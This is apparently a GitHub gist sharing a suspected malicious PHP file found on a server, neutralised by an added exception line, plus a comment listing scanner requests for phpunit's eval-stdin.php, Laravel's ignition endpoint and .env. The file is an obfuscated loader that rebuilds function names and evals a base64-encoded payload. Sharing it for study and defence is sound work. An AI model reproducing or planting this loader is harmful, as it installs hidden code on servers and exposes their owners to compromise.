Skip to content

Instantly share code, notes, and snippets.

@mp035

mp035/malicious.php

Last active March 8, 2023 14:55
Show Gist options
  • Save mp035/8b39ae853c36f29c936caa44855f617a to your computer and use it in GitHub Desktop.
Save mp035/8b39ae853c36f29c936caa44855f617a to your computer and use it in GitHub Desktop.
Download ZIP
A suspected malicious file found on a php server (throw line added to prevent accidental execution).
Raw
malicious.php
<?php throw new \Exception("This file is likely a malicious file! Do not run it unless you know what you are doing!"); ?>
<?php $O00OO0=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}
.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}
.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};
eval($O00O0O("JE8wTzAwMD0iTHdOV2ZheHNCcUNqb3Bkbkh0WVZ2a1VaR0tFck1ibEl5RFFBSnVlZ1JYemlPU1RjRm1QaGlFcktPVlhOYVVlYlRDa0RMbnVaZ3dZRkd5UmhtUGNBempmSnRRTVdzb0JJdlNxSGxwZHhmWkZTU1lFV3FSbEtTWWt2c2ZUOGQzYVRISkNjdTJ4Z0FlSDhpM3N3ZGJFZ2tMQStkTHN6ZGJYMEZqNER2RUNDRkl4Q0gzcmNrZVd3bzBGdHFSWnFLemtwVktYY3QxMEN5b055QWVKV0FHY3B5R3JnSEx3VHRsOUdTWVhsWTFOREZwY05GU2trS3prMFBvYU9QcGxuRlNra2llc09ZMFpTWndaU0t6a1JxMHJacVladlpsOVNxMDlZdDEwV2lJSkRpekhRdGw5R1NZWGxZMU5ERnBjTkZTa2tLemtRdUsxY3QxMEN5b055QWVKV0FlSldBZWFjdTJ4Z0FlSDhGcDlRa2VhYlAyWGdIYjBJRjN0Y0ZLNElkcHgwa0xKNml6OERpSXNPWTBaU1p3WlNLemtxc1p0S3NadE9xd2xyc1Nra2lJSGd0ejR3bzBGdHFSWnFLemtwVktYY3QxMVB0MjV4UEtZRG9TNERkZTlwUDI1MGRiWElISUpnZElIN2VJSldBZWE5RktYQkZvTnlBZUpXQWVKV0FlYWN1MnhnQWVIOEZwOVFrZWFiUDJYZ0hiMElIcFp3QWI1YVkxWVdZd2x0cVpZV3NZWGlBakNmZGU5cFAyNTBkYlhJSElKZ2RJSDdlSUpXQWVhOWVEMHlWS3VUVm9yQkZvZlR0bDlMc1pzUHRCSkVtZWtreVNjN2VwWmJWRzhXdEJYYkZLNTBGb0ErZWJYcFAzdG5BR1pRdTNzNUhHWTlBcDExUExzQ0hHbHprZTlwUDN0bmlLc3hrR1JJQUcxY2tHeGdGajBJWVI5cVplQStlYlhDUERhMWtlYTBNb2FjZFN0cFZLWGNBSWFRdUsxY2RTdHBWS1hjQUlKZ2RXVDhWSzVFa29mV2tMY0VGcTBJSDNaSVBLYzBBSWEydUtYMUZxMElrb2FOUDJsd0FJSmdkV1Q4aTJGZ0hwMCtlYkVna0dmK2RlOTBIYjREdkVDOWVwY3B5R2NCSDJaMHllc09zMFpZS3pIRU1qSkRvU3dDTUVUd3VvcjFlcTBXSDJ4Y1BHWE9Gb3hjdXpXSXUzWnpQZUpuSHpKbmlLY1FIMlpia290Y0FHeDBrTGFCdkk4Z1BvbVFQcFpnUDJrQ1BMRjVpcHJnUFM5MnNLWGVtTHdnSDI5UUZ6YThBR3R4SDJXSXlxTnlGS3JUUHpKRGRHcmNQRHNjSGI0OGtHWjRrR2x6RktSV1BwbG5GcTBJVnBabnVwOTBBSWFiUDJYQmRTQVhycUpJQUx0Z2szbTlBYlJFQUlhQ0ZqMElWcFpudXA5MEFiNERpSXN4SDNZUXRCRWdrR1o0a0dsekZLUitkR3R6ZElIN2VEMHl0R3JUQWowV3UzWnpQbDlDUHBjMHllc09zMFpZS3prNG1MV0RvU3c3QUdyMUhwWE9IMlowUDNhMHllc2JWZUVXZjFaU3FSOWZabDlTc1pzWll3NVlZd2x2WTBGbFlJRVdtU3c3dEx0Y0gzWk5rZUo5QUdyMUhwWE9Gb3hjdXpXd3UyV0N2MloydUtFVHRCOCt0ejR3SHBaQmtLWDB5cU55ZEI0PSI7ICAKICAgICAgICBldmFsKCc/PicuJE8wME8wTygkTzBPTzAwKCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwKjIpLCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwLCRPTzAwMDApLCAgICAKICAgICAgICAkT08wTzAwKCRPME8wMDAsMCwkT08wMDAwKSkpKTs="));?>
@wize-wiz
Copy link

wize-wiz commented Mar 8, 2023

Yea it's a typical bot scanner, only the 200 requests are interesting though, as in the following files:

/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/_ignition/execute-solution
/.env

from these requests:

128.199.209.214 - - [20/Feb/2023:09:57:17 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 31 "-" "python-requests/2.18.4"
20.225.133.97 - - [26/Feb/2023:09:06:01 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 1931 "-" "python-requests/2.28.2"
20.172.144.200 - - [03/Mar/2023:14:23:37 +0000] "GET /.env HTTP/1.1" 200 1931 "-" "python-requests/2.28.2"

Where it's quite interesting the same file requests throw a 404, some a 500 and some a 200. Because of the different sizes, I guess it has to do with the data being send, but that doesn't explain the 404.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment